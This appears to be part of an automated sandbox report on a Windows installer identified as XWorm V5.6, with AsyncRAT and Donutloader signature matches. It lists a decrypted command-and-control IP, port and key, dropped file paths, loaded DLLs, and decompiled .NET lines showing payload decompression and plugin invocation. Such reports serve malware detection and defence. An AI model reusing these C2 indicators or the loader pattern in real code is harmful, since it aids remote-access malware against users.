Source: 0.2.103-o_Installer.exe.5390000.1.raw.unpack |
String decryptor: 59.56.110.103 |
Source: 0.2.103-o_Installer.exe.5390000.1.raw.unpack |
String decryptor: 7000 |
Source: 0.2.103-o_Installer.exe.5390000.1.raw.unpack |
String decryptor: <123456789> |
Source: 0.2.103-o_Installer.exe.5390000.1.raw.unpack |
String decryptor: <Xwormmm> |
Source: 0.2.103-o_Installer.exe.5390000.1.raw.unpack |
String decryptor: XWorm V5.6 |
Source: 0.2.103-o_Installer.exe.5390000.1.raw.unpack |
String decryptor: USB.exe |
Source: dump.pcap, type: PCAP |
Matched rule: Windows_Trojan_Donutloader_f40e3759 Author: unknown |
Source: 0.2.103-o_Installer.exe.5390000.1.unpack, type: UNPACKEDPE |
Matched rule: Detects AsyncRAT Author: ditekSHen |
Source: 0.2.103-o_Installer.exe.5390000.1.raw.unpack, type: UNPACKEDPE |
Matched rule: Detects AsyncRAT Author: ditekSHen |
Source: 00000000.00000002.3671240808.0000000002ED0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY |
Matched rule: Windows_Trojan_Donutloader_f40e3759 Author: unknown |
Source: 00000000.00000002.3672250082.0000000005390000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY |
Matched rule: Detects AsyncRAT Author: ditekSHen |
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\BEDT2L3A\103[1].ccp, type: DROPPED |
Matched rule: Windows_Trojan_Donutloader_f40e3759 Author: unknown |
Source: C:\Users\Public\Downloads\ind.cod, type: DROPPED |
Matched rule: Windows_Trojan_Donutloader_f40e3759 Author: unknown |
Source: C:\Users\user\Desktop\103-o_Installer.exe |
Code function: 0_2_003B007E |
0_2_003B007E |
Source: C:\Users\user\Desktop\103-o_Installer.exe |
Code function: 0_2_003B5A2A |
0_2_003B5A2A |
Source: C:\Users\user\Desktop\103-o_Installer.exe |
Code function: 0_2_003B738F |
0_2_003B738F |
Source: C:\Users\user\Desktop\103-o_Installer.exe |
Code function: 0_2_003AFBE9 |
0_2_003AFBE9 |
Source: C:\Users\user\Desktop\103-o_Installer.exe |
Code function: 0_2_003B0BD6 |
0_2_003B0BD6 |
Source: C:\Users\user\Desktop\103-o_Installer.exe |
Code function: 0_2_003B041C |
0_2_003B041C |
Source: C:\Users\user\Desktop\103-o_Installer.exe |
Code function: 0_2_003B54D9 |
0_2_003B54D9 |
Source: C:\Users\user\Desktop\103-o_Installer.exe |
Code function: 0_2_003B6657 |
0_2_003B6657 |
Source: C:\Users\user\Desktop\103-o_Installer.exe |
Code function: 0_2_003B5F7B |
0_2_003B5F7B |
Source: C:\Users\user\Desktop\103-o_Installer.exe |
Code function: 0_2_003B7F4F |
0_2_003B7F4F |
Source: C:\Users\user\Desktop\103-o_Installer.exe |
Code function: 0_2_003B07EE |
0_2_003B07EE |
Source: C:\Users\user\Desktop\103-o_Installer.exe |
Code function: 0_2_053A55D8 |
0_2_053A55D8 |
Source: C:\Users\user\Desktop\103-o_Installer.exe |
Code function: 0_2_053AA290 |
0_2_053AA290 |
Source: C:\Users\user\Desktop\103-o_Installer.exe |
Code function: 0_2_053A4D08 |
0_2_053A4D08 |
Source: C:\Users\user\Desktop\103-o_Installer.exe |
Code function: 0_2_053AAFD0 |
0_2_053AAFD0 |
Source: C:\Users\user\Desktop\103-o_Installer.exe |
Code function: 0_2_053AE918 |
0_2_053AE918 |
Source: C:\Users\user\Desktop\103-o_Installer.exe |
Code function: 0_2_053A07A0 |
0_2_053A07A0 |
Source: C:\Users\user\Desktop\103-o_Installer.exe |
Code function: 0_2_053A49C0 |
0_2_053A49C0 |
Source: dump.pcap, type: PCAP |
Matched rule: Windows_Trojan_Donutloader_f40e3759 os = windows, severity = x86, creation_date = 2021-09-15, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Donutloader, fingerprint = 6400b34f762cebb4f91a8d24c5fce647e069a971fb3ec923a63aa98c8cfffab7, id = f40e3759-2531-4e21-946a-fb55104814c0, last_modified = 2022-01-13 |
Source: 0.2.103-o_Installer.exe.5390000.1.unpack, type: UNPACKEDPE |
Matched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT |
Source: 0.2.103-o_Installer.exe.5390000.1.raw.unpack, type: UNPACKEDPE |
Matched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT |
Source: 00000000.00000002.3671240808.0000000002ED0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY |
Matched rule: Windows_Trojan_Donutloader_f40e3759 os = windows, severity = x86, creation_date = 2021-09-15, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Donutloader, fingerprint = 6400b34f762cebb4f91a8d24c5fce647e069a971fb3ec923a63aa98c8cfffab7, id = f40e3759-2531-4e21-946a-fb55104814c0, last_modified = 2022-01-13 |
Source: 00000000.00000002.3672250082.0000000005390000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY |
Matched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT |
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\BEDT2L3A\103[1].ccp, type: DROPPED |
Matched rule: Windows_Trojan_Donutloader_f40e3759 os = windows, severity = x86, creation_date = 2021-09-15, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Donutloader, fingerprint = 6400b34f762cebb4f91a8d24c5fce647e069a971fb3ec923a63aa98c8cfffab7, id = f40e3759-2531-4e21-946a-fb55104814c0, last_modified = 2022-01-13 |
Source: C:\Users\Public\Downloads\ind.cod, type: DROPPED |
Matched rule: Windows_Trojan_Donutloader_f40e3759 os = windows, severity = x86, creation_date = 2021-09-15, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Donutloader, fingerprint = 6400b34f762cebb4f91a8d24c5fce647e069a971fb3ec923a63aa98c8cfffab7, id = f40e3759-2531-4e21-946a-fb55104814c0, last_modified = 2022-01-13 |
Source: C:\Users\user\Desktop\103-o_Installer.exe |
Section loaded: apphelp.dll |
Jump to behavior |
Source: C:\Users\user\Desktop\103-o_Installer.exe |
Section loaded: wininet.dll |
Jump to behavior |
Source: C:\Users\user\Desktop\103-o_Installer.exe |
Section loaded: iertutil.dll |
Jump to behavior |
Source: C:\Users\user\Desktop\103-o_Installer.exe |
Section loaded: sspicli.dll |
Jump to behavior |
Source: C:\Users\user\Desktop\103-o_Installer.exe |
Section loaded: windows.storage.dll |
Jump to behavior |
Source: C:\Users\user\Desktop\103-o_Installer.exe |
Section loaded: wldp.dll |
Jump to behavior |
Source: C:\Users\user\Desktop\103-o_Installer.exe |
Section loaded: profapi.dll |
Jump to behavior |
Source: C:\Users\user\Desktop\103-o_Installer.exe |
Section loaded: kernel.appcore.dll |
Jump to behavior |
Source: C:\Users\user\Desktop\103-o_Installer.exe |
Section loaded: ondemandconnroutehelper.dll |
Jump to behavior |
Source: C:\Users\user\Desktop\103-o_Installer.exe |
Section loaded: winhttp.dll |
Jump to behavior |
Source: C:\Users\user\Desktop\103-o_Installer.exe |
Section loaded: mswsock.dll |
Jump to behavior |
Source: C:\Users\user\Desktop\103-o_Installer.exe |
Section loaded: iphlpapi.dll |
Jump to behavior |
Source: C:\Users\user\Desktop\103-o_Installer.exe |
Section loaded: winnsi.dll |
Jump to behavior |
Source: C:\Users\user\Desktop\103-o_Installer.exe |
Section loaded: urlmon.dll |
Jump to behavior |
Source: C:\Users\user\Desktop\103-o_Installer.exe |
Section loaded: srvcli.dll |
Jump to behavior |
Source: C:\Users\user\Desktop\103-o_Installer.exe |
Section loaded: netutils.dll |
Jump to behavior |
Source: C:\Users\user\Desktop\103-o_Installer.exe |
Section loaded: dnsapi.dll |
Jump to behavior |
Source: C:\Users\user\Desktop\103-o_Installer.exe |
Section loaded: rasadhlp.dll |
Jump to behavior |
Source: C:\Users\user\Desktop\103-o_Installer.exe |
Section loaded: fwpuclnt.dll |
Jump to behavior |
Source: C:\Users\user\Desktop\103-o_Installer.exe |
Section loaded: mscoree.dll |
Jump to behavior |
Source: C:\Users\user\Desktop\103-o_Installer.exe |
Section loaded: amsi.dll |
Jump to behavior |
Source: C:\Users\user\Desktop\103-o_Installer.exe |
Section loaded: vcruntime140_clr0400.dll |
Jump to behavior |
Source: C:\Users\user\Desktop\103-o_Installer.exe |
Section loaded: ucrtbase_clr0400.dll |
Jump to behavior |
Source: C:\Users\user\Desktop\103-o_Installer.exe |
Section loaded: cryptsp.dll |
Jump to behavior |
Source: C:\Users\user\Desktop\103-o_Installer.exe |
Section loaded: rsaenh.dll |
Jump to behavior |
Source: C:\Users\user\Desktop\103-o_Installer.exe |
Section loaded: cryptbase.dll |
Jump to behavior |
Source: C:\Users\user\Desktop\103-o_Installer.exe |
Section loaded: userenv.dll |
Jump to behavior |
Source: C:\Users\user\Desktop\103-o_Installer.exe |
Section loaded: version.dll |
Jump to behavior |
Source: C:\Users\user\Desktop\103-o_Installer.exe |
Section loaded: wbemcomn.dll |
Jump to behavior |
Source: C:\Users\user\Desktop\103-o_Installer.exe |
Section loaded: avicap32.dll |
Jump to behavior |
Source: C:\Users\user\Desktop\103-o_Installer.exe |
Section loaded: msvfw32.dll |
Jump to behavior |
Source: C:\Users\user\Desktop\103-o_Installer.exe |
Section loaded: winmm.dll |
Jump to behavior |
Source: C:\Users\user\Desktop\103-o_Installer.exe |
Section loaded: winmm.dll |
Jump to behavior |
Source: 103-o_Installer.exe |
Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IMPORT is in: .rdata |
Source: 103-o_Installer.exe |
Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_RESOURCE is in: .rsrc |
Source: 103-o_Installer.exe |
Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_BASERELOC is in: .reloc |
Source: 103-o_Installer.exe |
Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG is in: .rdata |
Source: 103-o_Installer.exe |
Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IAT is in: .rdata |
Source: 0.2.103-o_Installer.exe.5390000.1.raw.unpack, Messages.cs |
.Net Code: NewLateBinding.LateCall(obj, (Type)null, "Invoke", new object[2]{null,new object[5]{Settings.Host,Settings.Port,Settings.SPL,Settings.KEY,Helper.ID()}}, (string[])null, (Type[])null, (bool[])null, true) |
Source: 0.2.103-o_Installer.exe.5390000.1.raw.unpack, Messages.cs |
.Net Code: NewLateBinding.LateCall(obj, (Type)null, "Invoke", new object[2]{null,new object[2]{Pack[2],Helper.Decompress(Convert.FromBase64String(Pack[3]))}}, (string[])null, (Type[])null, (bool[])null, true) |
Source: C:\Users\user\Desktop\103-o_Installer.exe |
Code function: 0_2_003B40E4 LoadLibraryW,GetProcAddress,GetProcAddress,EncodePointer,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer, |
0_2_003B40E4 |
Source: C:\Users\user\Desktop\103-o_Installer.exe |
Process information set: NOOPENFILEERRORBOX |
Jump to behavior |
Source: C:\Users\user\Desktop\103-o_Installer.exe |
Process information set: NOOPENFILEERRORBOX |
Jump to behavior |
Source: C:\Users\user\Desktop\103-o_Installer.exe |
Process information set: NOOPENFILEERRORBOX |
Jump to behavior |
Source: C:\Users\user\Desktop\103-o_Installer.exe |
Process information set: NOOPENFILEERRORBOX |
Jump to behavior |
Source: C:\Users\user\Desktop\103-o_Installer.exe |
Process information set: NOOPENFILEERRORBOX |
Jump to behavior |
Source: C:\Users\user\Desktop\103-o_Installer.exe |
Process information set: NOOPENFILEERRORBOX |
Jump to behavior |
Source: C:\Users\user\Desktop\103-o_Installer.exe |
Process information set: NOOPENFILEERRORBOX |
Jump to behavior |
Source: C:\Users\user\Desktop\103-o_Installer.exe |
Process information set: NOOPENFILEERRORBOX |
Jump to behavior |
Source: C:\Users\user\Desktop\103-o_Installer.exe |
Process information set: NOOPENFILEERRORBOX |
Jump to behavior |
Source: C:\Users\user\Desktop\103-o_Installer.exe |
Process information set: NOOPENFILEERRORBOX |
Jump to behavior |
Source: C:\Users\user\Desktop\103-o_Installer.exe |
Process information set: NOOPENFILEERRORBOX |
Jump to behavior |
Source: C:\Users\user\Desktop\103-o_Installer.exe |
Process information set: NOOPENFILEERRORBOX |
Jump to behavior |
Source: C:\Users\user\Desktop\103-o_Installer.exe |
Process information set: NOOPENFILEERRORBOX |
Jump to behavior |
Source: C:\Users\user\Desktop\103-o_Installer.exe |
Process information set: NOOPENFILEERRORBOX |
Jump to behavior |
Source: C:\Users\user\Desktop\103-o_Installer.exe |
Process information set: NOOPENFILEERRORBOX |
Jump to behavior |
Source: C:\Users\user\Desktop\103-o_Installer.exe |
Process information set: NOOPENFILEERRORBOX |
Jump to behavior |
Source: C:\Users\user\Desktop\103-o_Installer.exe |
Process information set: NOOPENFILEERRORBOX |
Jump to behavior |
Source: C:\Users\user\Desktop\103-o_Installer.exe |
Process information set: NOOPENFILEERRORBOX |
Jump to behavior |
Source: C:\Users\user\Desktop\103-o_Installer.exe |
Process information set: NOOPENFILEERRORBOX |
Jump to behavior |
Source: C:\Users\user\Desktop\103-o_Installer.exe |
Process information set: NOOPENFILEERRORBOX |
Jump to behavior |
Source: C:\Users\user\Desktop\103-o_Installer.exe |
Process information set: NOOPENFILEERRORBOX |
Jump to behavior |
Source: C:\Users\user\Desktop\103-o_Installer.exe |
Process information set: NOOPENFILEERRORBOX |
Jump to behavior |
Source: C:\Users\user\Desktop\103-o_Installer.exe |
Process information set: NOOPENFILEERRORBOX |
Jump to behavior |
Source: C:\Users\user\Desktop\103-o_Installer.exe |
Process information set: NOOPENFILEERRORBOX |
Jump to behavior |
Source: C:\Users\user\Desktop\103-o_Installer.exe |
Process information set: NOOPENFILEERRORBOX |
Jump to behavior |
Source: C:\Users\user\Desktop\103-o_Installer.exe |
Process information set: NOOPENFILEERRORBOX |
Jump to behavior |
Source: C:\Users\user\Desktop\103-o_Installer.exe |
Process information set: NOOPENFILEERRORBOX |
Jump to behavior |
Source: C:\Users\user\Desktop\103-o_Installer.exe |
Process information set: NOOPENFILEERRORBOX |
Jump to behavior |
Source: C:\Users\user\Desktop\103-o_Installer.exe |
Process information set: NOOPENFILEERRORBOX |
Jump to behavior |
Source: C:\Users\user\Desktop\103-o_Installer.exe |
Process information set: NOOPENFILEERRORBOX |
Jump to behavior |
Source: C:\Users\user\Desktop\103-o_Installer.exe |
Process information set: NOOPENFILEERRORBOX |
Jump to behavior |
Source: C:\Users\user\Desktop\103-o_Installer.exe |
Process information set: NOOPENFILEERRORBOX |
Jump to behavior |
Source: C:\Users\user\Desktop\103-o_Installer.exe |
Process information set: NOOPENFILEERRORBOX |
Jump to behavior |
Source: C:\Users\user\Desktop\103-o_Installer.exe |
Process information set: NOOPENFILEERRORBOX |
Jump to behavior |
Source: C:\Users\user\Desktop\103-o_Installer.exe |
Process information set: NOOPENFILEERRORBOX |
Jump to behavior |
Source: C:\Users\user\Desktop\103-o_Installer.exe |
Process information set: NOOPENFILEERRORBOX |
Jump to behavior |
Source: C:\Users\user\Desktop\103-o_Installer.exe |
Process information set: NOOPENFILEERRORBOX |
Jump to behavior |
Source: C:\Users\user\Desktop\103-o_Installer.exe |
Process information set: NOOPENFILEERRORBOX |
Jump to behavior |
Source: C:\Users\user\Desktop\103-o_Installer.exe |
Process information set: NOOPENFILEERRORBOX |
Jump to behavior |
Source: C:\Users\user\Desktop\103-o_Installer.exe |
Process information set: NOOPENFILEERRORBOX |
Jump to behavior |
Source: C:\Users\user\Desktop\103-o_Installer.exe |
Process information set: NOOPENFILEERRORBOX |
Jump to behavior |
Source: C:\Users\user\Desktop\103-o_Installer.exe |
Process information set: NOOPENFILEERRORBOX |
Jump to behavior |
Source: C:\Users\user\Desktop\103-o_Installer.exe |
Process information set: NOOPENFILEERRORBOX |
Jump to behavior |
Source: C:\Users\user\Desktop\103-o_Installer.exe |
Process information set: NOOPENFILEERRORBOX |
Jump to behavior |
Source: C:\Users\user\Desktop\103-o_Installer.exe |
Process information set: NOOPENFILEERRORBOX |
Jump to behavior |
Source: C:\Users\user\Desktop\103-o_Installer.exe |
Process information set: NOOPENFILEERRORBOX |
Jump to behavior |
Source: C:\Users\user\Desktop\103-o_Installer.exe |
Code function: 0_2_003B40E4 LoadLibraryW,GetProcAddress,GetProcAddress,EncodePointer,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer, |
0_2_003B40E4 |
Source: C:\Users\user\Desktop\103-o_Installer.exe |
Code function: GetLocaleInfoA, |
0_2_003B4859 |
Source: C:\Users\user\Desktop\103-o_Installer.exe |
Code function: ___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo, |
0_2_003AE04E |
Source: C:\Users\user\Desktop\103-o_Installer.exe |
Code function: __getptd,_LcidFromHexString,GetLocaleInfoA,_TestDefaultLanguage, |
0_2_003AF895 |
Source: C:\Users\user\Desktop\103-o_Installer.exe |
Code function: _strlen,_strlen,_GetPrimaryLen,EnumSystemLocalesA, |
0_2_003AF955 |
Source: C:\Users\user\Desktop\103-o_Installer.exe |
Code function: _strlen,_GetPrimaryLen,EnumSystemLocalesA, |
0_2_003AF9BC |
Source: C:\Users\user\Desktop\103-o_Installer.exe |
Code function: __getptd,_TranslateName,_GetLcidFromLangCountry,_GetLcidFromLanguage,_TranslateName,_GetLcidFromLangCountry,_GetLcidFromLanguage,_strlen,EnumSystemLocalesA,GetUserDefaultLCID,IsValidCodePage,IsValidLocale,GetLocaleInfoA,_strcpy_s,__invoke_watson,GetLocaleInfoA,GetLocaleInfoA,__itow_s, |
0_2_003AF9F8 |
Source: C:\Users\user\Desktop\103-o_Installer.exe |
Code function: ___crtGetLocaleInfoA,GetLastError,___crtGetLocaleInfoA,__calloc_crt,___crtGetLocaleInfoA,__calloc_crt,_free,_free,__invoke_watson,GetLocaleInfoW,GetLocaleInfoW,__calloc_crt,GetLocaleInfoW,_free,GetLocaleInfoW, |
0_2_003ADC2B |
Source: C:\Users\user\Desktop\103-o_Installer.exe |
Code function: GetLocaleInfoW,GetLocaleInfoW,_malloc,GetLocaleInfoW,WideCharToMultiByte,__freea, |
0_2_003B44BA |
Source: C:\Users\user\Desktop\103-o_Installer.exe |
Code function: __calloc_crt,__malloc_crt,_free,__malloc_crt,_free,_free,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___free_lconv_num,InterlockedDecrement,InterlockedDecrement,InterlockedDecrement,_free,_free, |
0_2_003AECAA |
Source: C:\Users\user\Desktop\103-o_Installer.exe |
Code function: GetLocaleInfoW,GetLocaleInfoW,GetACP, |
0_2_003AF4CD |
Source: C:\Users\user\Desktop\103-o_Installer.exe |
Code function: _LocaleUpdate::_LocaleUpdate,__crtGetLocaleInfoA_stat, |
0_2_003B4594 |
Source: C:\Users\user\Desktop\103-o_Installer.exe |
Code function: __getptd,_LcidFromHexString,GetLocaleInfoA, |
0_2_003AF5C2 |
Source: C:\Users\user\Desktop\103-o_Installer.exe |
Code function: GetLocaleInfoW,_GetPrimaryLen,_strlen, |
0_2_003AF669 |
Source: C:\Users\user\Desktop\103-o_Installer.exe |
Code function: __getptd,_LcidFromHexString,GetLocaleInfoA,GetLocaleInfoA,GetLocaleInfoA,_strlen,GetLocaleInfoA,_strlen,_TestDefaultLanguage, |
0_2_003AF6C4 |
Source: C:\Users\user\Desktop\103-o_Installer.exe |
Code function: __calloc_crt,__malloc_crt,_free,__malloc_crt,_free,_free,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___free_lconv_mon,_free,_free,_free,InterlockedDecrement,InterlockedDecrement,_free,_free, |
0_2_003AEF98 |
Source: C:\Users\user\Desktop\103-o_Installer.exe |
Code function: ___getlocaleinfo,__malloc_crt,__calloc_crt,__calloc_crt,__calloc_crt,__calloc_crt,GetCPInfo,___crtGetStringTypeA,___crtLCMapStringA,___crtLCMapStringA,_memmove,_memmove,_memmove,InterlockedDecrement,_free,_free,_free,_free,_free,_free,_free,_free,_free,InterlockedDecrement, |
0_2_003A5FC5 |